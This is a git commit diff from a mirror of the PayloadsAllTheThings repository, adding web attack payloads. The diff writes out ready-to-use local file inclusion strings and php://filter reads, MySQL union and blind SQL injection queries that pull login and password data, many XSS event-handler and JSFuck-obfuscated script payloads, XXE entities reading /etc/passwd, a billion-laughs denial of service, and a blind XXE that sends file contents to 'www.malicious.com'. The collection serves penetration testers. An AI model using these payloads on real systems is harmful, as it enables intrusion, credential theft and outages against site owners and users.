mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-18 18:36:10 +00:00
XXE renamed, little updates in SQL/Include + enum
This commit is contained in:
parent
c73124a79d
commit
22e8dc091f
@ -5,6 +5,8 @@
|
||||
Google Dork to find subdomains
|
||||
```
|
||||
site:*.domain.com -www
|
||||
site:http://domain.com ext:php
|
||||
site:http://domain.com filtype:pdf
|
||||
```
|
||||
|
||||
## Scripts
|
||||
|
@ -11,10 +11,11 @@ http://example.com/index.php?page=../../etc/passwd
|
||||
http://example.com/index.php?page=%252e%252e%252f
|
||||
```
|
||||
|
||||
LFI Wrapper rot13 and base64
|
||||
LFI Wrapper rot13 and base64 - php://filter case insensitive
|
||||
```
|
||||
http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
|
||||
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
|
||||
http://example.com/index.php?page=php=pHp://FilTer/convert.base64-encode/resource=index.php
|
||||
```
|
||||
|
||||
LFI Wrapper zip
|
||||
|
21
README.md
21
README.md
@ -9,9 +9,28 @@ Last modifications :
|
||||
* SQLi payloads improved
|
||||
* Enumeration added (WIP)
|
||||
|
||||
TODO : Basic methodology for hunting bugs and vulnerabilities
|
||||
# Tools
|
||||
|
||||
* [Web Developper](https://addons.mozilla.org/en-Gb/firefox/addon/web-developer/)
|
||||
* [Hackbar](https://addons.mozilla.org/en-Gb/firefox/addon/hackbar/?src=search)
|
||||
* [Burp Proxy](https://portswigger.net)
|
||||
* [Fiddler](https://www.telerik.com/download/fiddler)
|
||||
* [DirBuster](https://sourceforge.net/projects/dirbuster/)
|
||||
* [GoBuster](https://github.com/OJ/gobuster)
|
||||
* [Knockpy](https://github.com/guelfoweb/knock)
|
||||
* [SQLmap](http://sqlmap.org)
|
||||
* [Eyewitness](https://github.com/ChrisTruncer/EyeWitness)
|
||||
* [Nikto](https://cirt.net/nikto2)
|
||||
* [Recon-ng](https://bitbucket.org/LaNMaSteR53/recon-ng)
|
||||
|
||||
# More resources
|
||||
Book's list:
|
||||
* Web Hacking 101 - https://leanpub.com/web-hacking-101
|
||||
* The Web Application Hacker's Handbook - https://www.amazon.fr/Web-Application-Hackers-Handbook-Exploiting/dp/1118026470
|
||||
|
||||
Blogs/Websites
|
||||
* http://blog.zsec.uk/101-web-testing-tooling/
|
||||
* https://blog.innerht.ml
|
||||
* https://blog.zsec.uk
|
||||
* https://www.exploit-db.com/google-hacking-database
|
||||
* https://www.arneswinnen.net
|
@ -33,10 +33,10 @@ SELECT id FROM users WHERE username='' or true-- AND password='input2'
|
||||
# MYSQL
|
||||
MySQL Union Based
|
||||
```
|
||||
gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||
gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||
gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,schema_name,0x7c)+fRoM+information_schema.schemata
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,table_name,0x7C)+fRoM+information_schema.tables+wHeRe+table_schema=...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,column_name,0x7C)+fRoM+information_schema.columns+wHeRe+table_name=...
|
||||
UniOn Select 1,2,3,4,...,gRoUp_cOncaT(0x7c,data,0x7C)+fRoM+...
|
||||
```
|
||||
|
||||
|
||||
@ -66,10 +66,10 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)
|
||||
|
||||
MySQL Blind with MAKE_SET
|
||||
```
|
||||
MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||
MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||
MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||
MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
AND MAKE_SET(YOLO<(SELECT(length(version()))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(version(),POS,1)),1)
|
||||
AND MAKE_SET(YOLO<(SELECT(length(concat(login,password)))),1)
|
||||
AND MAKE_SET(YOLO<ascii(substring(concat(login,password),POS,1)),1)
|
||||
```
|
||||
|
||||
|
||||
@ -88,7 +88,6 @@ MySQL DIOS - Dump in One Shot
|
||||
```
|
||||
(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0D,0x0A,' [ ',table_schema,' ] > ',table_name,' > ',column_name,0x7C))))a)#
|
||||
(select (@) from (select(@:=0x00),(select (@) from (db_data.table_data) where (@)in (@:=concat(@,0x0D,0x0A,0x7C,' [ ',column_data1,' ] > ',column_data2,' > ',0x7C))))a)#
|
||||
|
||||
```
|
||||
|
||||
# POSTGRESQL
|
||||
|
@ -46,6 +46,7 @@ Svg payload
|
||||
|
||||
XSS for HTML5
|
||||
```
|
||||
<body onload=alert(/XSS/.source)>
|
||||
<input autofocus onfocus=alert(1)>
|
||||
<select autofocus onfocus=alert(1)>
|
||||
<textarea autofocus onfocus=alert(1)>
|
||||
@ -53,7 +54,9 @@ XSS for HTML5
|
||||
<video/poster/onerror=alert(1)>
|
||||
<video><source onerror="javascript:alert(1)">
|
||||
<video src=_ onloadstart="alert(1)">
|
||||
<details/open/ontoggle="alert`1`"
|
||||
<details/open/ontoggle="alert`1`">
|
||||
<audio src onloadstart=alert(1)>
|
||||
<marquee onstart=alert(1)>
|
||||
```
|
||||
|
||||
|
||||
@ -136,7 +139,7 @@ XSS in SVG (short)
|
||||
more payloads in ./files
|
||||
|
||||
|
||||
# XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
## XSS with Relative Path Overwrite - IE 8/9 and lower
|
||||
|
||||
You need these 3 components
|
||||
```
|
||||
@ -175,7 +178,7 @@ From : http://www.thespanner.co.uk/2014/03/21/rpo/
|
||||
```
|
||||
|
||||
|
||||
# Mutated XSS for Browser IE8/IE9
|
||||
## Mutated XSS for Browser IE8/IE9
|
||||
```
|
||||
<listing id=x><img src=1 onerror=alert(1)></listing>
|
||||
<script>alert(document.getElementById('x').innerHTML)</script>
|
||||
@ -217,6 +220,7 @@ Bypass parenthesis for string
|
||||
alert`1`
|
||||
```
|
||||
|
||||
Exotic payloads
|
||||
```
|
||||
<script>$=1,alert($)</script>
|
||||
<script ~~~>confirm(1)</script ~~~>
|
||||
@ -279,7 +283,6 @@ PHP a = val2
|
||||
Use JSFuck to encode the payload (alert())
|
||||
```javascript
|
||||
<script>$=~[];$={___:++$,$$$$:(![]+"")[$],__$:++$,$_$_:(![]+"")[$],_$_:++$,$_$$:({}+"")[$],$$_$:($[$]+"")[$],_$$:++$,$$$_:(!""+"")[$],$__:++$,$_$:++$,$$__:({}+"")[$],$$_:++$,$$$:++$,$___:++$,$__$:++$};$.$_=($.$_=$+"")[$.$_$]+($._$=$.$_[$.__$])+($.$$=($.$+"")[$.__$])+((!$)+"")[$._$$]+($.__=$.$_[$.$$_])+($.$=(!""+"")[$.__$])+($._=(!""+"")[$._$_])+$.$_[$.$_$]+$.__+$._$+$.$;$.$$=$.$+(!""+"")[$._$$]+$.__+$._+$.$+$.$$;$.$=($.___)[$.$_][$.$_];$.$($.$($.$$+"\""+$.$_$_+(![]+"")[$._$_]+$.$$$_+"\\"+$.__$+$.$$_+$._$_+$.__+"("+$.___+")"+"\"")())();</script>
|
||||
|
||||
<script>(+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]]]+[+[]]+([][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!+[]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!+[]+[])[+[]]+(!+[]+[])[!+[]+!+[]+!+[]]+(!+[]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[[+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]]])()</script>
|
||||
```
|
||||
|
||||
|
@ -18,7 +18,7 @@ Classic XXE
|
||||
<?xml version="1.0"?>
|
||||
<!DOCTYPE data [
|
||||
<!ELEMENT data (#ANY)>
|
||||
<!ENTITY file SYSTEM "file:///sys/power/image_size">
|
||||
<!ENTITY file SYSTEM "file:///etc/passwd">
|
||||
]>
|
||||
<data>&file;</data>
|
||||
```
|
||||
@ -28,6 +28,21 @@ Classic XXE Base64 encoded
|
||||
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,PCFF...Cg=="> %init; ]><foo/>
|
||||
```
|
||||
|
||||
PHP Wrapper inside XXE
|
||||
```
|
||||
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
|
||||
<contacts>
|
||||
<contact>
|
||||
<name>Jean &xxe; Dupont</name>
|
||||
<phone>00 11 22 33 44</phone>
|
||||
<adress>42 rue du CTF</adress>
|
||||
<zipcode>75000</zipcode>
|
||||
<city>Paris</city>
|
||||
</contact>
|
||||
</contacts>
|
||||
```
|
||||
|
||||
|
||||
Deny Of Service - Billion Laugh Attack
|
||||
```
|
||||
<!DOCTYPE data [
|
||||
@ -40,6 +55,18 @@ Deny Of Service - Billion Laugh Attack
|
||||
<data>&a4;</data>
|
||||
```
|
||||
|
||||
Blind XXE
|
||||
```
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?>
|
||||
<!DOCTYPE foo [
|
||||
<!ELEMENT foo ANY >
|
||||
<!ENTITY % xxe SYSTEM "file:///etc/passwd" >
|
||||
<!ENTITY callhome SYSTEM "www.malicious.com/?%xxe;">
|
||||
]
|
||||
>
|
||||
<foo>&callhome;</foo>
|
||||
```
|
||||
|
||||
|
||||
XXE OOB Attack (Yunusov, 2013)
|
||||
```
|
Loading…
Reference in New Issue
Block a user